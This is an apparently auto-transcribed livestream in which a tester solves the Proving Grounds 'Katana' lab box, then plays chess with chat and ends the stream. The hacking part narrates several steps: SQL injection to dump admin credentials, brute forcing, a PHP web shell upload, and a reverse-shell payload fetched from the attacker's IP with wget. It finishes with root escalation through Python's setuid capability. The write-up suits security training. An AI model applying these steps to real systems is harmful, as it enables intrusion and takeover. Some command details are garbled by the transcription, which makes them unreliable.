the results for Katana as it does this, and we'll see. We have VS FTPD 303, which is not vulnerable. But there's also no anonymous mode, so that's not going to be helpful. 22 looks like we can authenticate using passwords. That's always useful. 7080. We know that it's protected by SSL. which means it might be HTTPS, so we can always just check that. So we do HTTPS 7080 and see if that comes back. No, so it's not HTTP, but 8088 is, and it looks like it's another a kind of like a port alias for 80. Yeah, it's the same. It looks like it's the same thing. We go back to this Durbuster though. So looking, we don't want 403s. There's this ebook though. Service status, which is interesting. So we'll go here. Oh, hang on a minute. Did we do this one? No, we didn't. We haven't done this one, but this is... If this uses my exploit again... I think this is just going to use my exploit, right? Oh, I don't want elastics. Online bookstore. Please work. Alright, so we search exploit -m that Python 347 we need the URL. This is gonna be oops. It's gonna be this. Okay, right. Well, the shell failed to upload. Yeah. So that's... They may have patched that, I guess. Let me just make sure. So the question is, can we go to admin add? Rewrite your exploiting. Oh. Maybe, yeah. Alright, well that didn't work. Let's see if there's anything else. We'll check out this one as well. This one is different though, look. So even though this has... Looks like it had the same kind of thing, we've got all this. Let's do Stream Raiders very quickly. Well, this one can't, Christy. They seem to have nuked this one, but let's have a look and see. Anyway, I guess I should try it on. I should try and see if port 8088 has it. See if we can actually win this time. I don't know how we managed to lose. Yeah, no, they are all Von Hub. That's what because Offsec bought Von Hub and then they created Proving Grounds. Which is why the InfoSec prep box is there. Okay. At least we won that one. Well done, Christy. Let's go here. And... okay, so this one had a few others. So blocked redirects to blocked, which is interesting. Let's just try this. Okay. I guess it's not very interesting. CGI bin, CSS, probably nothing. We could always look at CGI bin and see if we can find anything. But let's have a look at /docs. Open Lightspeed Web Server 1.5. Okay, that's interesting. There's also a PHP info page, apparently. And we can just search for password quickly. No. Sometimes MySQL have a password in there. That's protected. Which is protected, okay. So this is protected by HTTP auth. We also got this upload.php and upload.html. I'm going to go to the HTML page first. Because this probably uses... It probably submits to the upload.php if we type upload.php. Yeah. Interesting. I mean, let's just upload a file and see what happens. Move to other web server, Katana Tib. So did it move to here? Okay. No. Oh, there was another one actually. There was another web server, I think, on 8715. So we could try that. So let's just 8715. There we go. So we found that. So the question is, can we just upload a PHP file? So let's try. Let's just cmd. Well, actually, not even that. phpinfo.php. And then we're just going to do php info. This is just a quick test to see if we can even upload PHP and get it to be executable. This will be home. Proving grounds. Katana. phpinfo.php. Submit. And then it's basically just it's appended. Prepended Katana. So we go here. Access denied. Interesting. So we can't upload PHP. What else is there? There's this git logs. It's a 403. So there's a few things here. Let's go back and check that Open Lightspeed Web Server 1.5. Let's go to exploitdb and check. Okay, I'm just going to take out web server just in case. Upload to another port. What? Yeah, it's, we know where it was uploaded because Katana Tib got uploaded here. Right, Katana Tib got uploaded here, but Katana PHP info.php apparently is access denied. If I go to... Yeah. That file definitely exists because we get an access denied instead of 404 not found. Well, we could... We could go back to where is it? The ebook site and go to the app and log in. I think this was a bypass. No. We could try looking for the bookstore. So if I go back to my exploit online bookstore, and then we'll search for this. Because there's probably another book. Okay. The arbitrary file upload is probably. Yeah. It's mine. We have the ID SQL injection. Detail ID equals 44. So let's try that. Detail is not found. Okay. Is this vulnerable? Yeah. Oh, hang on. So this is vulnerable to SQL injection. We can do order by 1, order by 2, order by 3, order by 4. Come on. Can we order by 6? Can we order by 20? Does that crash it? There we go. Okay, so we were getting there. What? Oh. Unknown column 10. I think I just could have gone a bit further, I guess. 9. 8. Was I really one off? 7. Okay, so we've discovered that there are 7 columns we can do this union injection in. So let's just do union, base union, select. We need to do null, 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 null. And we can do probably a union all actually. And we'll just try changing some of these to 1s. Yeah, we could do 1, 2. I was just hoping null would at least come up with something. Okay, this is a blind SQL injection then. Presumably, unless we can do. Oh, yeah, actually, we could do that. Yeah, there we go. Yeah, good point. So if we go to the book description column, which is this, then we can do version. Okay, I have recently written, or at least I've updated my cheat sheet for SQL injection, which is nice. So I'm just going to grab, we can try and do select, I'm trying to do DB from MySQL.db. Yeah, that doesn't work. Okay. We can try and do select schema name from information underscore schema dot schemata. And obviously we need to do a group concat. I'm not even entirely sure if this is the right way of doing it, but SQL injection is always useful to know. So we know the database is called ebook. So now we can try and do tables. So if we want to do table underscore name, database tables where schemata equals ebook. Nope, hang on. Table scheme. Sorry. Table scheme. I always get that one confused. No, what? Schema. Ah, that's one. There we go. So if we go, we probably want the admin table. So now we do, obviously, we want to enumerate the admin table columns. So column name from there, which is going to be from the columns table where a table name equals admin. We may have to put the database in there as well, but let's just see what happens. Right, name and password. Okay, so this is all fine. So now we can just do and here we can just do a regular concat name dash pass from admin. There we go. So this is the admin user's password. So now we can just use CrackStation. I'll use CrackStation here. CrackStation will probably crack this. Yeah, the result is admin. Okay. So we could have guessed that, but that's a nice way around it, I guess. So now at least we can log in. Admin and admin. So let's even see if we can upload something here. Okay, yeah, so they've removed edit book. So, oh, actually, maybe I can just confirm. Yeah. Well, that's annoying. So that was never going to work. Is there anything else we can use here? I'm guessing we could try going to protected. Like, is this admin? No. This isn't Funbox. No, this is very similar to Funbox. Uses the exact same freaking site. I wonder if we can manipulate this, maybe this upload. So let's just do the upload again, actually. Submit. Post upload. So what does it take? Yes, it just has the file. So I guess, can we do that? Doesn't look like it. Let's just test it, actually, see if this Katana 2, does it upload to Katana 2 still? Katana tib2.png. Oops. Okay, yeah, that does That still works. Okay, what else we got? Well, I guess we could try admin on the FTP server. That's probably something worth trying. FTP. Obviously, we need to take up the HTTP. Admin. Nope. We could try SSH as admin. 192.168.65.83. Try admin. Okay. See if there's any. We didn't try and write a file. That is a good point. That might be worth trying. Or reading, yeah, you're correct actually. Let's go back to this. So we're gonna, instead of here using this, we're just gonna do a load file. Okay, that didn't seem to work. But we can try and at least do, let's just do version, and do into out file. And now we actually do know the location of this server, which is this. So we can at least try and write it to this, and if this doesn't work, so we'll just do test.txt. Access denied for user. So can we just go to maybe try var dub. No. Let's just double check this is still working for one. That's still working. Yeah, temp, that's a good idea. No. Okay, so we don't have any write permissions. Which is annoying. Okay. So we could probably try and brute force this might be protected by admin. Well, we tried reading etsy password. I mean, we could try we could try load file, I guess, etsy host name, and get rid of this crap. And yeah, we get nothing. Yeah, nothing there. Let's just try brute forcing this. So we can use Hydra. If I have Hydra installed, apparently I don't. So we're going to use admin, pass, user, sorry. No, it is user, share, wordless, rock user. And then we want the HTTP, Get and server is this. Actually, hang on. It's technically this one. So to grab that out. Should work. I guess what we probably should do. We'll remove. Let's just do a quick check and see if it detects that these don't work. Okay, good. Alright. So we'll do that and we'll see what happens. Let me just double check. Okay, give me a sec. We did not find anything. Okay. It's tried 6,000 tries. Interesting. This is definitely an interesting box. I guess the other one thing we didn't do, I think, which might work when we were doing our enumeration. Can we do just do a count? No, there is only one user. We tried doing the file upload. We don't have write permissions. Okay. Service manager. Where's the web console for this? Let's just Google this. So we're just going to Google Open Lightspeed Web Server exploit. Here we go. So there might be a service manager. Oops. No, not. Well, I guess we can look at the CGI then and see. Reload a file hosted from our server and execute PHP from there. I don't think so, because we don't even have a way to request files. When we tried to write a file, a PHP file here, and put up PHP. Wait. Oh. Well, hang on a minute. Why didn't that work before? We got access denied before, remember? I just want to double check something. 8715. Oh, were we trying to... Hang on a minute. I swear we... It was here! We just didn't... okay. No. Hang on. I need to check this because we were getting a permission denied before. Yeah. Look, this access denied, but now it works. Okay. So, for some reason, we can quit that. Alright, let's just do a cmd.php. And then we'll just do a simple shell. That was so bizarre. Well, I probably need to actually rename it to move command.phh to command.php. Probably help. So we got Katana, access denied. Did it? When we overwrite it, maybe? When we like upload something else? Can we upload tib.php again? PNG again? And now does it work? No, okay. Oh, hang on. It does. So when you upload a file again, it... I'm sorry, not CMD, it's 0. Well, there we go. That is absolutely bizarre. But, okay, rev shell gen. And we're gonna have to do 192.168.49.65. I mean, let's have a look at the code when we get up there, because that's weird. We need to obviously base64 encode this. Not base64 encode, sorry. I need to URL encode it. And then we'll do a battle and see if this gives us anything. Which it did not. Can we just connect at least? Let's just try. Let's try just doing this. Which NC? Maybe there's not NC in the box. There is. Okay. Okay. Do we have wget? We do. So we have wget. So what we'll do is we'll just do an MSF Venom. Linux. It probably is x84. Yeah, it's 64-bit. Okay, so we'll do a shell reverse TCP. The L host is going to be 192.168.49.65. Port's going to be 4444. And we're going to do that. And we'll do Stream Raiders while that compiles. That is very strange, though. But hey, we found it in the end. That SQL injection was just an SQL injection. So they were using vulnerable software that they'd patched, effectively. Okay, well done, Newdenil and Rune Mason. Screen. Thank you, OffTech, for the follow. So now we have this. So we'll grab my IP address and we'll download it. We may actually have. No, we can't just do that. Okay, yeah. So we can do. We'll do wget dash capital O. Temp. Temp rev dot elf. And then HTB // reverse dot and we can just do tail the access log. I think Apache needs to start. Okay, refresh. Okay, I got it. So now let's just try. We'll just ls-l temp. There it is. So now we can just make that executable. Commod. Can't do a plus. We need 2b x temp /rev.elf. And then if we just run that, we should now get a shell. Yay!
We are in.
We have Python, so we can do import pty, pty.spawn, bin bash. To get a slightly more stable shell, we can then background that, do stty size, and then stty raw-echo fg. And then we just need to do stty rows equals 39. Sorry, not rows 39 cols 172. Export term equals xterm -2 by 6 color. And that pretty much gives me a full stable shell. I can now cancel stuff. I can do like tab complete and everything. So let's go cd home, Katana. There's nothing there. Oops. Can I at least view the password file? Well, the password file has... Okay. The password file should not have these in it, but it does, so that's fun. So, password.hash. Let's put these both in here. So the password file can technically have these. That's absolutely fine. They used to. This is where passwords used to be stored on Unix before somebody pointed out that this file was world readable. We can go to name that hash here. And we'll just paste the hash in. And this should give us John is SHA-512 crypt. And we'll use John. Word list equals user share word list rock u. Format equals that, and then password.hash. And we'll see if that actually cracks anything. Meanwhile, let's just try sudo. We don't have the password for www.data, so we cannot do that. So let's try finding some SUID files. There's a neat little command I have here for doing that. John hasn't cracked anything yet. Okay. None of those seem interesting. One thing I guess I should try is see if what the permissions are like on that. No, they're all readable. Are they maybe? Still readable. Okay. Yeah, there's nothing there. I guess we can't CD into root, right? No. Can we CD into opt? Anything in opt? There's the manager. HTML. Yes, this is where all these files were. Interesting. Oh, there's local.txt. Okay. We found that. So we'll submit that to the flag. This extension is called HackTools. Very useful extension. This is not cracking anything, so that's interesting. I guess we could try SUing to Katana with admin, but I doubt it. Yeah. Okay. Let's just do a PS. EF and see what's running. Yeah, okay. Yeah, with the cron might. At this point, we might honestly, it might just be worth uploading. Actually, let's just do it. We're gonna wget HTTP 192.168.49.65 privesc linpeas.sh. And then chmod +s linpeas, and then /linpeas -q into t linpeas.txt. Okay. Now we can just keep going down. So sudo might be vulnerable, but I mean, it's an old box, so yeah, probably. Broken pipe? Interesting. We are in bin bash. We're working on Katana from Proving Grounds. Okay. Oh, there we go. Does anyone know what this means? Capabilities, exactly. And specifically, Python 2.7 has the capability set UID, which means anything we run using Python 2.7 should just give us root. So if we do Python Python 2.7 -c import os.system id. Oh no, so we need to hang on. Which Python 2.7? Is that the right one? User bin Python 2.7. Okay, so I think there is something you have to do with it, right? GTFO bins. We just go to Python capabilities. No. os.setUID, that's what we need. So we can change the ID of what we run commands with. There we go. UID root. So can we just do bin bash? I think we can. Yep. And we're root. Flag is another file. It's in the proof file, presumably. There it is. Yeah, so capabilities are weird. So the main difference... Well, I should probably explain capabilities. So it used to be that the only way for a low-level user to be able to run commands that require high access was for you. The Linux system had to grant the file SUID privileges, right? So the program would run as root or as whatever user owned the file, and that's okay if you're 100% sure that the code in the file is safe, right? Like a good example, every single operating system that uses Linux, the ping utility, right, is an SUID file. And that's because ping has to send ICMP packets, and the only way to do that is as root. Okay? But the code for ping is so secure that there's no way to get a shell from ping. There's no way to read files using ping. Ping just pings stuff, right? So it was fine. So where you obviously get into trouble is where you use SUID for anything else. But the main issue is, what if you only need root access to run a very specific chunk of code, right? Because if you think about it, the only thing that ping needs root privileges for is sending the actual ICMP packets. Handling the actual data, processing it, displaying output, that can all be done as a low privilege. So this is where capabilities came in. And capabilities allow you to set very specific permissions, such that if a file needs to, if it needs to make network decisions, like if it needs to send packets that require root access, you can just tell it, oh yeah, you'll get that capability. And then even if you find a bug which allows you to execute code in the binary, because it only has that capability to elevate privileges for sending certain packets, you won't be able to exploit that, right? So effectively, instead of the entire binary running as root, it's dedicating certain chunks of code within the binary to run as root rather than the entire thing. So it's a lot safer. And it's a relatively modern thing. Capabilities the last like 5 years or so, I would say, they've come into fruition. But yeah, that's what capabilities are. Now, obviously, this capability, this one is very special. This is effectively the capability that just allows you to do the same thing as an SUID. This, if a binary has this capability, it can pretty much just run anything, run any kind of code as an elevated user. So this is a very dangerous one. You usually shouldn't use this. You see, this is what I'm talking about, ping, right? There's a capability called net raw, which allows you to send pretty much raw network packets. Okay, so that's why this ping capability is always there now. And I think actually if you do ls-l which ping, yeah, you see how ping no longer is set UID, it's just regular executable. So even when you run ping, it's still running as my user. Does that make sense? I wonder if mine is actually doing that. Yeah. So actually we could just we could do ping 1111 and then do htop, or actually just ps-ef grep ping. There it is. It's running as me. The get cap command. Yeah. So I don't actually use. I think you can just do get cap. All right. Or is it get cap -r? There's a way of doing it. I'm gonna have to refresh my memory. Get cap command. Get cap recursive. There we go. That's the one. Yeah. So you want to do get cap recursive forwards. That's not the right one. Get cap recursive /. That will print out a ton of information that you don't want, like all the file permission access. So you always send it to dev null. And what this is doing, it's running through the entire operating system, the entire file system, and it's printing out the files that have capabilities assigned to them. And so in this case, we've got dump cap, which has the capnet raw, which we've talked about. Capnet admin, I'm not entirely sure what that does, but did I cancel it? Come on. Didn't mean to do that. I meant to do that. Okay. So you can always just Google these capabilities. Hacktricks has a nice one, as it always does. Should be a nice list of them. Maybe not. Capnet admin allows the capability holder to modify the exposed network namespace's firewall, routing tables, and socket permissions. Okay. This has capnet bind service. Just search for bind. There it is. Bind service. This means that it's possible to listen in any port, even the privileged ones. Right? So, you know how, if I was to try and set up a NVLP, so I'm Tiberius, so I'm a low privilege user. If I tried to listen on port 10, okay, he apparently listens on port 10. Maybe because I'm an admin. Maybe because I need to listen on a specific host. There shouldn't... Yeah. Hostname, port... Hang on. I wonder if I can just do 192.168.4965. I shouldn't be able to listen on that port, which makes me think that NC isn't actually listening on that port. But that is weird. I'm going to do 1968.1.100. Can I actually nmap that port now? I honestly don't know what's quite going on. You shouldn't be able to bind. I guess I could try it with the Python web server. HTB server on port 10. Okay, maybe they freaking changed that, but you used to you aren't able usually to bind to ports lower than 1024. This is why if you try and run Apache, usually you have to run Apache as root because it listens to port 80. But Apache is safe because it immediately downgrades to the www data user. So even though it's listening on port 80, it passes everything off to new processes which are running as www data. But yeah, I don't know why that's working. It shouldn't. Now I'm... Let's just try Python 3-m HTB server port 12. Yeah, I don't know. That shouldn't happen. I wonder if I can do it here. Python 3-m HTTP server 10. There we go. That's what it should do. See that? I tried listening on port 10, but if I listen on port 1000, permission denied 1023, permission denied 1024, suddenly it works. This is because ports 1 through 1024 are protected. You're not supposed to be able to listen to them. You can't bind to them without being root. That makes sense. Did we submit the flag? We didn't even submit the flag. Okay, so I need to run this again. Catproof.txt, come on. Any questions about that box? Laggy. Okay. Progress has been updated. Nice. Alright, we'll do a few spins. We will do one more marbles, one more stream raiders. And then, yeah, we'll call it a night. So we're going to do... How many spins have we got left? I think I haven't been updating it. I think we've got 13 left now. Alright. Okay. I'm glad this came up because I think I have a new system that I actually want to test out. So let's restart. So I just want to try this in chat. You can either go to chatplayschess.com/my username, or you can do !move and then type a move in. So I'm kind of just interested to see what actually happens. So presumably if somebody in chat could just type a move in, or go to chatplayschess.com. I'll give a link. I just want to see if this is even a viable option. Because it didn't ask me to set up any bot. So I don't understand how it's going to read the moves. And yeah, it doesn't look like... Okay. Okay, so I don't think it liked E8. Oh, well, you couldn't move E8 because that's the king. Alright, so we can do this. We're playing a chess game against chat. We'll see how they do. So basically you vote on the move and then the top move wins. And if you don't make a move within 30 seconds, you just get another 30 seconds. I think that's how it works. Yeah, you see, you get another 30 seconds. I think it would have to be D7, not 7D. You always use the ladder first. But I think you can always just do, just D5. Well, it was working a minute ago. E7's already moved. I don't even know if this is... Okay, there we go. The move G8 to F6 has been queued. So now you can do !1 if you want to vote for that move. I guess that's how it works. I don't know. At least it seems to work in chat. Okay, cool. So, all right, let's I guess we'll do that. We'll see how this goes. This might be extremely long. I don't know. Alright, so now C6 has been queued. Well, I'm glad it works. Good move. You gotta do exclamation point move, Christy. Thanks, Fair Master. Thank you for stopping in. I think it's a dash. Move C8 dash G4. I think you can, if the move is unambiguous, you can do exclamation point move and then just the square. So if you do... Right, that's it, yeah. C8 to G4. Nice, okay. Sure, then I'll take that. I think this at least works. I think when we have more people in chat. But I think is this slightly better than just having some random person in chat play chess? Alright, well, yeah, this might be easier when the stream is a bit more active, I guess. If not, it's alright. I at least wanted to try it and see if it was if it worked, which it seems to work, so that's always good. It might work better if you go to the website. I don't know. We don't have to play. We can always do stream raiders and then find someone to raid. But Brainiac seems to be at least moving. Where did you move? Oh, you castled. Okay. Well, that's good. Any questions about the box, by the way? I'm happy to answer questions as we play this. You don't play chess. Well, you're playing it right now, which is always fine. But if you don't want to play, don't worry. We can skip it for another time. I honestly do not mind. Just let me know, because you're the only one submitting moves, I think, which is fine. Okay, moving out of the way. Always nice. Okay. Trying to think of something. It's much slower than playing in with a time control. But I figure at least this is actually playing against chat rather than just playing against a single person from chat. Even though technically I'm playing a single person from chat right now, so. Alright, I'm gonna say we, oh, Brennick keeps coming back in. I was gonna say, maybe we just, end it and, do Stream Raiders and then raid someone. Brennick, if you're having fun, I do not mind continuing to play with you. Ultimately up to you, of course. Alright, no problem. We'll just close it. Okay, let's do Stream Raiders very quickly. And then we'll find someone to raid. I'm just glad it works. Yeah. I agree. Obviously, when the stream's a bit more popping, and people can just spam their moves and vote. It'll be a bit better. Who do we want to raid? J-Bears or Sec IT guy? Let's see how long J-Bears has been on for. 5 hours, okay. He might be wrapping up. Yeah, J-Bears 11. Oh, Sec ID guy is offline now, so I guess we have to raid J-Bears. Alright, okay, awesome. So, let me put the stream ending up, and I'm gonna raid J-Bears 11. Okay, thank you so much for joining me on this Sub-Mentoring Monday. I had a blast. I hope everybody enjoyed the content. Hope people learned a few things. On the screen are my socials. Please follow me on Twitter, join the Discord server, subscribe to my YouTube channel, and if you're not following me on Twitch, please give me a follow. You'll get notifications when I go live, so it's always good. Otherwise, I hope everyone has a great few days before we do Web App Wednesday on Wednesday. Same time, same place. Yeah. And thank you very much for watching. Let's go raid J-Biz.